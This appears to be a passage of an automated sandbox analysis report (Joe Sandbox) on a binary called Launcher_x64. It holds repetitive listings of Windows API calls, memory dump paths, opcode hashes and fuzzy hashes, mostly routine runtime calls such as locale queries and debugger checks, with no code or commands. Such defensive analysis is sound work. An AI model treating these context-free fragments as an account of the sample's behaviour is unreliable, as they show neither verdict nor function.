                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3988221542-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 77489b1090966328f3f07c41f4870016e8a0d06eb2f7be2d783cdda5807c53e1
                                                                                                                                                                                                                                                                                        • Instruction ID: d11ac4dc9dab15a745ef4423f1ca118ea1ee39dd6de5fda9f23ae9d6f7ac5952
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77489b1090966328f3f07c41f4870016e8a0d06eb2f7be2d783cdda5807c53e1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF01D17660C6167BCB258BB8F9697E9BB50FF41334F24426FE052955C1DF22A690C370
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D122A9,?,?,00D03E32,00001000,?,00D03D7A), ref: 00D231F3
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00D108F1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 118556049-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00D0BDD1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 118556049-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00D28515,00000002,00000000,?,?,?,00D28515,?,00000000), ref: 00D28BDD
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00D28515,00000002,00000000,?,?,?,00D28515,?,00000000), ref: 00D28C06
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,00D28515,?,00000000), ref: 00D28C1B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D284E7
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00D28525
                                                                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00D28538
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D28580
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D2859B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 415426439-0
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00D29216
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00D2930A
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00D29349
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00D2937C
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1164774033-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D16534
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00D16600
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D16619
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00D16623
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6d004db1e1d530777ec3803eb55d07cc919aa30f5de151e9104138384e85f543
                                                                                                                                                                                                                                                                                        • Instruction ID: 76953300afc11c3ee55e77bd50c8f9b1db3081ab984a1f2dfd0fa11dce8a27b9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d004db1e1d530777ec3803eb55d07cc919aa30f5de151e9104138384e85f543
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC31F675D05318ABDB20DFA4E9497CDBBB8BF08304F1041EAE40CAB250EB709A85CF65
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D17122
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00D17131
                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00D1713A
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00D17147
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c27f80bb6f2cab2fd8ab1a092a2bf70921794c19c142f66447fd2c8101773303
                                                                                                                                                                                                                                                                                        • Instruction ID: 3c949e7e007648ac5ef534950dae326d8d32433d89021921dba2622549929ba6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c27f80bb6f2cab2fd8ab1a092a2bf70921794c19c142f66447fd2c8101773303
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF05F74D1120DEBCB00DBB4DA8999EBBF5EF1C200B914996A412E7210E630AB44DF61
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D2871F
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D28769
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D2882F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 661929714-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cd226d64f9cb752375b2d33e86bb6672e93f4dd8d13ef944eeff277fb9135f56
                                                                                                                                                                                                                                                                                        • Instruction ID: 52ab9fcf0452e0b6894172f15efe28a469e643012b7007287ad91d160e4e08c1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd226d64f9cb752375b2d33e86bb6672e93f4dd8d13ef944eeff277fb9135f56
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E61B7715012279FEB289F24EC82B7AB7A9EF24308F584079ED05C6181EB74DD91EB70
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D1F3A8
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D1F3B2
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D1F3BF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6f36b9d05ecfffedc7472f79a0a87d3026b484acb87f8cb4ae07ad8d8281ab1a
                                                                                                                                                                                                                                                                                        • Instruction ID: 8ce1be63655f99d1bacbc62888445281a7c2f5e5949872843ca7a4beb1815a87
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f36b9d05ecfffedc7472f79a0a87d3026b484acb87f8cb4ae07ad8d8281ab1a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F531A475911318ABCB21DF64E8897DDBBB8FF08310F5041EAE41CA7251EB749B858F64
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D2CCF2,?,?,00000008,?,?,00D3318B,00000000), ref: 00D2CFC4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2992b74c17b7204ea7d4e172cd411fdb601183b7fd026391a07bcea60435a4c2
                                                                                                                                                                                                                                                                                        • Instruction ID: 84d916510f747a357a084922619cb105df35caeae1c0ef8f745696d4e34fc7cd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2992b74c17b7204ea7d4e172cd411fdb601183b7fd026391a07bcea60435a4c2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3B16B311206189FD714CF28D58AB687BE1FF55368F298658E8D9CF2A1C335DD82CB50
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D161AA
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 53ebe6c7dfbe22c23cc4de559845853e30607d2c3e073ff4ef2cc183f04d5798
                                                                                                                                                                                                                                                                                        • Instruction ID: edb252e968e911e30e71130b4409ba25fc22c63ab6ecbb49bb7bea1c5c566bf4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53ebe6c7dfbe22c23cc4de559845853e30607d2c3e073ff4ef2cc183f04d5798
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFA16EB9D057059FDB18CF58E8916A9BBF1FB49328F28812AD511E7360D734A880CFA1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 8ae0f78073da5d7b7f3e754ce0f03405a8c0c10643814b826e17a75fc474c9c4
                                                                                                                                                                                                                                                                                        • Instruction ID: 8490eef3900030a18e7fd1fd82970c9ccf3bc4ffaf9751d1f6d502a5d61a0521
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ae0f78073da5d7b7f3e754ce0f03405a8c0c10643814b826e17a75fc474c9c4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AC1D1749A0706BFCB24CFA8E4846FAB7B1EF09310F186619D49297652CB31E9C5CB71
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D289D1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2c86ac0f65adcfe469dc823ba5626e541995c9291179e98c65dff5bbb9a177cd
                                                                                                                                                                                                                                                                                        • Instruction ID: 39a45f6103afa1de8b1c416ec6c79e68a7a88d6f47228474a63d90642c9e555a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c86ac0f65adcfe469dc823ba5626e541995c9291179e98c65dff5bbb9a177cd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7321B331656226ABDB289F24EC41ABA73A8EF64318F14007AFD01C6241EF74ED40AA70
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: a5c725318475a9c98142dc01643ef39430c79d5b6df5239ec4a0708b8c8bcdc3
                                                                                                                                                                                                                                                                                        • Instruction ID: 1180d8cfce4a77957a1b2df9c86e0413b8e8ab42e9004f12821f272b4dc31e2c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5c725318475a9c98142dc01643ef39430c79d5b6df5239ec4a0708b8c8bcdc3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB1E770A02A06ABCB258E6CB5556FE77B1EF01310F18461EE49297A91DF31DAC1CB73
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00D286CB,00000001,00000000,?,-00000050,?,00D284BB,00000000,-00000002,00000000,?,00000055,?), ref: 00D286A2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                        • Opcode ID: bcc59ff4c6c076a7e753b1014dbfb1d4d5d15ba9d66be832d89f3f9fc4b5ecd4
                                                                                                                                                                                                                                                                                        • Instruction ID: 58b9851437ee5793eed15c2b9eda83a05bd97bf80db55e700bd6cb113e322420
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcc59ff4c6c076a7e753b1014dbfb1d4d5d15ba9d66be832d89f3f9fc4b5ecd4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E011293A2007115FDB18AF38E89167AB791FF9031EB19442CE94787640E775B942D760
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D28AF1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 242bc8f3d887b010f4a77dd187ab9a1ef617ff80fe53717e3a6162b4465e2b48
                                                                                                                                                                                                                                                                                        • Instruction ID: 8dc65013347198b9d0b9e105a4271a814c231ed96522c743c32e88f32ce0e99e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 242bc8f3d887b010f4a77dd187ab9a1ef617ff80fe53717e3a6162b4465e2b48
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86110A726111169BDB14AF24EC02ABA73ECDF54318B14407AE505C7241DF38ED01D770
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00D288E7,00000000,00000000,?), ref: 00D28C76
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5657b4c18ab2dd056ed1a18688f5cf1129b4e8d4e9b720f5353792c3cacdbdc6
                                                                                                                                                                                                                                                                                        • Instruction ID: 2fdd76c6b6e0dc5f04a8b485f2ba6635297b0630ab6cb20f0991cf022d861d83
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5657b4c18ab2dd056ed1a18688f5cf1129b4e8d4e9b720f5353792c3cacdbdc6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F301DB326065226BDF2C5724A8057BA3754DB50359F194429AC46A3280EF74FE51F5B0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
